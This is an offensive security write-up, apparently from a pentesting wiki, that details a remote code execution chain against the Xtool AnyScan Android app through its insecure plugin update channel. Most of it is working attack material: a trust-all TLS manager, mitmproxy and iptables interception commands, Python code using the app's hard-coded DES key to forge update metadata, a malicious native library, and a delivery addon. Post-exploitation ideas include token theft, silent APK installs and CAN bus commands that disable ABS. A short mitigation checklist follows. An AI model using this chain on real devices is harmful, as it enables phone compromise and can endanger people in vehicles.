Insecure In-App Update Mechanisms – Remote Code Execution via Malicious Plugins

Many Android applications implement their own “plugin” or “dynamic feature” update channels instead of using the Google Play Store. When the implementation is insecure an attacker able to intercept the traffic can supply arbitrary native code that will be loaded inside the app process, leading to full Remote Code Execution (RCE) on the handset – and in some cases on any external device controlled by the app (cars, IoT, medical devices …).

This page summarises a real‐world vulnerability chain found in the Xtool AnyScan automotive-diagnostics app (v4.40.11 → 4.40.40) and generalises the technique so you can audit other Android apps and weaponise the mis-configuration during a red-team engagement.

1. Identifying an Insecure TLS TrustManager

1. Decompile the APK with jadx / apktool and locate the networking stack (OkHttp, HttpUrlConnection, Retrofit…).
2. Look for a custom TrustManager or HostnameVerifier that blindly trusts every certificate:

public static TrustManager[] buildTrustManagers() {
    return new TrustManager[]{
        new X509TrustManager() {
            public void checkClientTrusted(X509Certificate[] chain, String authType) {}
            public void checkServerTrusted(X509Certificate[] chain, String authType) {}
            public X509Certificate[] getAcceptedIssuers() {return new X509Certificate[]{};}
        }
    };
}

3. If present the application will accept any TLS certificate → you can run a transparent MITM proxy with a self-signed cert:

mitmproxy -p 8080 -s addon.py  # see §4
iptables -t nat -A OUTPUT -p tcp --dport 443 -j REDIRECT --to-ports 8080  # on rooted device / emulator

2. Reverse-Engineering the Update Metadata

In the AnyScan case each app launch triggers an HTTPS GET to:

https://apigw.xtoolconnect.com/uhdsvc/UpgradeService.asmx/GetUpdateListEx

The response body is an XML document whose <FileData> nodes contain Base64-encoded, DES-ECB encrypted JSON describing every available plugin.

Typical hunting steps:

1. Locate the crypto routine (e.g. RemoteServiceProxy) and recover:
   • algorithm (DES / AES / RC4 …)
   • mode of operation (ECB / CBC / GCM …)
   • hard-coded key / IV (often 56-bit DES keys or 128-bit AES keys in constants)
2. Re-implement the function in Python to decrypt / encrypt the metadata:

from Crypto.Cipher import DES
from base64 import b64decode, b64encode

KEY = IV = b"\x2A\x10\x2A\x10\x2A\x10\x2A"  # 56-bit key observed in AnyScan

def decrypt_metadata(data_b64: str) -> bytes:
    cipher = DES.new(KEY, DES.MODE_ECB)
    return cipher.decrypt(b64decode(data_b64))

def encrypt_metadata(plaintext: bytes) -> str:
    cipher = DES.new(KEY, DES.MODE_ECB)
    return b64encode(cipher.encrypt(plaintext.ljust((len(plaintext)+7)//8*8, b"\x00"))).decode()

3. Craft a Malicious Plugin

1. Pick any legitimate plugin ZIP and replace the native library with your payload:

// libscan_x64.so – constructor runs as soon as the library is loaded
__attribute__((constructor))
void init(void){
    __android_log_print(ANDROID_LOG_INFO, "PWNED", "Exploit loaded! uid=%d", getuid());
    // spawn reverse shell, drop file, etc.
}

$ aarch64-linux-android-gcc -shared -fPIC payload.c -o libscan_x64.so
$ zip -r PWNED.zip libscan_x64.so assets/ meta.txt

2. Update the JSON metadata so that "FileName" : "PWNED.zip" and "DownloadURL" points to your HTTP server.
3. DES-encrypt + Base64-encode the modified JSON and copy it back inside the intercepted XML.

4. Deliver the Payload with mitmproxy

addon.py example that silently swaps the original metadata:

from mitmproxy import http
MOD_XML = open("fake_metadata.xml", "rb").read()

def request(flow: http.HTTPFlow):
    if b"/UpgradeService.asmx/GetUpdateListEx" in flow.request.path:
        flow.response = http.Response.make(
            200,
            MOD_XML,
            {"Content-Type": "text/xml"}
        )

Run a simple web server to host the malicious ZIP:

python3 -m http.server 8000 --directory ./payloads

When the victim launches the app it will:

• fetch our forged XML over the MITM channel;
• decrypt & parse it with the hard-coded DES key;
• download PWNED.zip → unzip inside private storage;
• dlopen() the included libscan_x64.so, instantly executing our code with the app’s permissions (camera, GPS, Bluetooth, filesystem, …).

Because the plugin is cached on disk the backdoor persists across reboots and runs every time the user selects the related feature.

5. Post-Exploitation Ideas

• Steal session cookies, OAuth tokens, or JWTs stored by the app.
• Drop a second-stage APK and silently install it via pm install (the app already has REQUEST_INSTALL_PACKAGES).
• Abuse any connected hardware – in the AnyScan scenario you can send arbitrary OBD-II / CAN bus commands (unlock doors, disable ABS, etc.).

Detection & Mitigation Checklist (blue team)

• NEVER ship a production build with a custom TrustManager/HostnameVerifier that disables certificate validation.
• Do not download executable code from outside Google Play. If you must, sign each plugin with the same apkSigning v2 key and verify the signature before loading.
• Replace weak/hard-coded crypto with AES-GCM and a server-side rotating key.
• Validate the integrity of downloaded archives (signature or at least SHA-256).

References

• NowSecure – Remote Code Execution Discovered in Xtool AnyScan App
• Android – Unsafe TrustManager patterns